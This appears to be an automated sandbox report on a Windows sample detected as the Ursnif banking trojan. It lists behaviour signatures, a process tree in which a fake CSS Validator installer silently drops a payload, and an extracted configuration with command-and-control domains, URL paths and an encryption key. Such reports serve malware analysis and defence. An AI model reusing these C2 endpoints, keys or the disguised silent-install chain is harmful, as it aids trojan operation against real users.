Play interactive tour

Edit tour

Windows Analysis Report yRqHWQ91dT

Overview

General Information

Sample Name:	yRqHWQ91dT (renamed file extension from none to exe)
Analysis ID:	508840
MD5:	b50ffa06eca2b3a4d92562561fc6b2d1
SHA1:	4cdbdb338a22fd11f0fcc973598e25ba54529db3
SHA256:	a181b562122fb3752137474073f22e1b2b1b4cc82a5269e73847a0e2e212cd56
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

Detected unpacking (changes PE section rights)

PE file has a writeable .text section

Writes or reads registry keys via WMI

Machine Learning detection for dropped file

Writes registry values via WMI

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains long sleeps (>= 3 min)

Drops files with a non-matching file extension (content does not match file extension)

Installs a raw input device (often for capturing keystrokes)

PE file contains an invalid checksum

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Installs a global mouse hook

Binary contains a suspicious time stamp

Launches processes in debugging mode, may be used to hinder debugging

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

yRqHWQ91dT.exe (PID: 5776 cmdline: 'C:\Users\user\Desktop\yRqHWQ91dT.exe' MD5: B50FFA06ECA2B3A4D92562561FC6B2D1)

msiexec.exe (PID: 3428 cmdline: msiexec /i 'C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi' /qn /norestart MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

msiexec.exe (PID: 2952 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 640 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7A8FDEF089EF820D04B2E0639E42DA17 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

audiodent.exe (PID: 5656 cmdline: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe MD5: A0052D6EAC0D6D4296DE89213447416D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "GP2bItvzCMVimwFhSq2LMu3Hl69+F5VOC4HbUzLcgCFvHPQPwYycui0JiyqQuwt1jV1IDboN9TEBxLB8CQWBGqcjZkZnRvT4fL8wjq8CCeHOLprVhSXFIxyR2QXzTHDcHr2ux9/r22BaiLqlqlqcKQ1PI6I3WFn39M0K5k1WypMPthcpEVFSO8sVBHvcqRSV", "c2_domain": ["get.updates.avast.cn", "huyasos.in", "curves.ws", "huyasos.in", "rorobrun.in", "huyasos.in", "tfslld.ws", "huyasos.in"], "botnet": "2002", "server": "12", "serpent_key": "44004499FJFHGTYB", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000009.00000003.462453858.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.462430424.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000002.524066037.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.462394649.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.462483110.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000002.524018514.00000000083B9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000009.00000003.462302321.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.462367584.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.462337552.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.462470017.0000000008A28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: audiodent.exe PID: 5656	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.audiodent.exe.7f70000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
9.2.audiodent.exe.83b94a0.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
9.2.audiodent.exe.83b94a0.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 9.2.audiodent.exe.7f70000.1.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "GP2bItvzCMVimwFhSq2LMu3Hl69+F5VOC4HbUzLcgCFvHPQPwYycui0JiyqQuwt1jV1IDboN9TEBxLB8CQWBGqcjZkZnRvT4fL8wjq8CCeHOLprVhSXFIxyR2QXzTHDcHr2ux9/r22BaiLqlqlqcKQ1PI6I3WFn39M0K5k1WypMPthcpEVFSO8sVBHvcqRSV", "c2_domain": ["get.updates.avast.cn", "huyasos.in", "curves.ws", "huyasos.in", "rorobrun.in", "huyasos.in", "tfslld.ws", "huyasos.in"], "botnet": "2002", "server": "12", "serpent_key": "44004499FJFHGTYB", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: yRqHWQ91dT.exe

Virustotal: Detection: 13%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Joe Sandbox ML: detected

Source: 9.2.audiodent.exe.980000.0.unpack

Avira: Label: TR/Crypt.XPACK.Gen7

Source: audiodent.exe, 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJJidwS/uILMBSO5DLGsBFknIXWWjQJe2kfdfEk3G/j66w4KkhZ1V61Rt4zLaMVCYpDun7FLwRjkMDSepO1q2DcCAwEAAQ==-----END PUBLIC KEY-----

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Unpacked PE file: 9.2.audiodent.exe.980000.0.unpack

Source: yRqHWQ91dT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\ReadMe.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\LICENSE.electron.txt	Jump to behavior

Source: yRqHWQ91dT.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256 source: SQLitePCLRaw.core.dll.4.dr
Source:	Binary string: C:\pdb\pdb\AppData\Service\dkdockhost\WPF\Data\ExpressAuthentication\Csv.pdb source: audiodent.exe, 00000009.00000000.279418131.0000000001217000.00000002.00020000.sdmp, audiodent.exe.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: SQLitePCLRaw.core.dll.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlcipher.most\obj\Release\netstandard2.0\SQLitePCLRaw.provider.e_sqlcipher.pdbSHA256y source: SQLitePCLRaw.provider.e_sqlcipher.dll.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlcipher.most\obj\Release\netstandard2.0\SQLitePCLRaw.provider.e_sqlcipher.pdb source: SQLitePCLRaw.provider.e_sqlcipher.dll.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlcipher.dllimport\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: SQLitePCLRaw.batteries_v2.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbj source: 530d7c.msi.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlcipher.dllimport\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: SQLitePCLRaw.batteries_v2.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 530d7c.msi.4.dr
Source:	Binary string: C:\pdb\pdb\AppData\Service\dkdockhost\WPF\Data\ExpressAuthentication\Csv.pdb,88 source: audiodent.exe, 00000009.00000000.279418131.0000000001217000.00000002.00020000.sdmp, audiodent.exe.4.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Code function: 1_2_0040646B FindFirstFileA,FindClose,	1_2_0040646B
Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Code function: 1_2_004027A1 FindFirstFileA,	1_2_004027A1
Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Code function: 1_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_004058BF

Source: Joe Sandbox View

ASN Name: VM-HOSTINGRU VM-HOSTINGRU

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443

Source: audiodent.exe, 00000009.00000000.279173277.00000000011AD000.00000002.00020000.sdmp, audiodent.exe.4.dr	String found in binary or memory: http://apache.org/xml/UnknownNSUCS4UCS-4UCS_4UTF-32ISO-10646-UCS-4UCS-4
Source: audiodent.exe, 00000009.00000000.279173277.00000000011AD000.00000002.00020000.sdmp, audiodent.exe.4.dr	String found in binary or memory: http://apache.org/xml/messages/XML4CErrors#FIXEDEBCDIC-CP-USIBM037IBM1047IBM-1047IBM1140IBM01140CCSI
Source: audiodent.exe, 00000009.00000000.279173277.00000000011AD000.00000002.00020000.sdmp, audiodent.exe.4.dr	String found in binary or memory: http://apache.org/xml/messages/XMLValidityWINDOWS-1252XERCES-XMLCHhttp://apache.org/xml/messages/XML
Source: 530d7c.msi.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 530d7c.msi.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 530d7c.msi.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 530d7c.msi.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 530d7c.msi.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 530d7c.msi.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: yRqHWQ91dT.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: yRqHWQ91dT.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 530d7c.msi.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 530d7c.msi.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 530d7c.msi.4.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: 530d7c.msi.4.dr	String found in binary or memory: http://t2.symcb.com0
Source: 530d7c.msi.4.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: 530d7c.msi.4.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: 530d7c.msi.4.dr	String found in binary or memory: http://tl.symcd.com0&
Source: 530d7c.msi.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ReadMe.txt.4.dr	String found in binary or memory: http://www.grsoftware.net/downloads/grbackpro/grbakpro.pdf
Source: ReadMe.txt.4.dr	String found in binary or memory: http://www.grsoftware.net/home/buynow.html
Source: audiodent.exe, 00000009.00000002.521033898.0000000001048000.00000002.00020000.sdmp, audiodent.exe.4.dr	String found in binary or memory: http://www.mega-nerd.com/libsndfile/
Source: audiodent.exe.4.dr	String found in binary or memory: https://bitbucket.org/Coin3D/
Source: audiodent.exe, 00000009.00000002.521033898.0000000001048000.00000002.00020000.sdmp, audiodent.exe.4.dr	String found in binary or memory: https://bitbucket.org/Coin3D/error
Source: audiodent.exe, 00000009.00000002.523746525.0000000007BDF000.00000004.00000001.sdmp	String found in binary or memory: https://get.updates.avast.cn/
Source: audiodent.exe, 00000009.00000002.523746525.0000000007BDF000.00000004.00000001.sdmp	String found in binary or memory: https://get.updates.avast.cn/I
Source: audiodent.exe, 00000009.00000002.523746525.0000000007BDF000.00000004.00000001.sdmp	String found in binary or memory: https://get.updates.avast.cn/sreamble/L9cG8Vo2GQztGm0qovd/ps29AL3_2BtYxlbeUwyhe0/qJy1kBhZdmLJX/23gke
Source: SQLitePCLRaw.core.dll.4.dr	String found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
Source: SQLitePCLRaw.provider.e_sqlcipher.dll.4.dr	String found in binary or memory: https://github.com/ericsink/SQLitePCL.rawF
Source: SQLitePCLRaw.core.dll.4.dr	String found in binary or memory: https://github.com/ericsink/SQLitePCL.rawX
Source: audiodent.exe, 00000009.00000002.521033898.0000000001048000.00000002.00020000.sdmp, audiodent.exe.4.dr	String found in binary or memory: https://groups.google.com/forum/#
Source: audiodent.exe, 00000009.00000002.523718501.0000000007BD4000.00000004.00000001.sdmp	String found in binary or memory: https://huyasos.in/
Source: audiodent.exe, 00000009.00000002.523890285.0000000007F5B000.00000004.00000010.sdmp	String found in binary or memory: https://huyasos.in/sreamble/1Cy_2BOoNkPfZNI/cBFrvY8_2BuNL_2FRI/EvMKECOy8/d_2Bs3isSO
Source: audiodent.exe, 00000009.00000002.523791607.0000000007C02000.00000004.00000001.sdmp	String found in binary or memory: https://huyasos.in/sreamble/1Cy_2BOoNkPfZNI/cBFrvY8_2BuNL_2FRI/EvMKECOy8/d_2Bs3isSO64yzYzMTFW/VpmMJy
Source: 530d7c.msi.4.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: 530d7c.msi.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ReadMe.txt.4.dr	String found in binary or memory: https://www.grsoftware.net
Source: 530d7c.msi.4.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: 530d7c.msi.4.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown

DNS traffic detected: queries for: get.updates.avast.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.462453858.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462430424.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.524066037.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462394649.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462483110.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462302321.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462367584.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462337552.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462470017.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodent.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: 9.2.audiodent.exe.7f70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.524018514.00000000083B9000.00000004.00000040.sdmp, type: MEMORY

Source: audiodent.exe, 00000009.00000000.279418131.0000000001217000.00000002.00020000.sdmp

Binary or memory string: GetRawInputData

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Windows user hook set: 0 mouse low level C:\Windows\System32\dinput8.dll

Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

Code function: 1_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_0040535C

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.462453858.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462430424.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.524066037.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462394649.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462483110.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462302321.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462367584.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462337552.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462470017.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodent.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: 9.2.audiodent.exe.7f70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.524018514.00000000083B9000.00000004.00000040.sdmp, type: MEMORY

System Summary:

PE file has a writeable .text section

Show sources

Source: audiodent.exe.4.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: yRqHWQ91dT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI14BC.tmp

Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

Code function: 1_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_00403348

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\530d79.msi

Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Code function: 1_2_00406945	1_2_00406945
Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Code function: 1_2_0040711C	1_2_0040711C
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_6EA5C160	9_2_6EA5C160
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F7AFC0	9_2_07F7AFC0
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F77FBE	9_2_07F77FBE
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F7836E	9_2_07F7836E

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_00981C90 GetProcAddress,NtCreateSection,memset,	9_2_00981C90
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_00981703 NtMapViewOfSection,	9_2_00981703
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_009819A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	9_2_009819A0
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F79A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	9_2_07F79A0F
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F7B1E5 NtQueryVirtualMemory,	9_2_07F7B1E5

Source: yRqHWQ91dT.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: audiodent.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Section loaded: libtrg2.dll	Jump to behavior

Source: yRqHWQ91dT.exe

Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

File read: C:\Users\user\Desktop\yRqHWQ91dT.exe

Jump to behavior

Source: yRqHWQ91dT.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\yRqHWQ91dT.exe 'C:\Users\user\Desktop\yRqHWQ91dT.exe'
Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i 'C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi' /qn /norestart
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7A8FDEF089EF820D04B2E0639E42DA17
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe
Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i 'C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi' /qn /norestart	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7A8FDEF089EF820D04B2E0639E42DA17	Jump to behavior
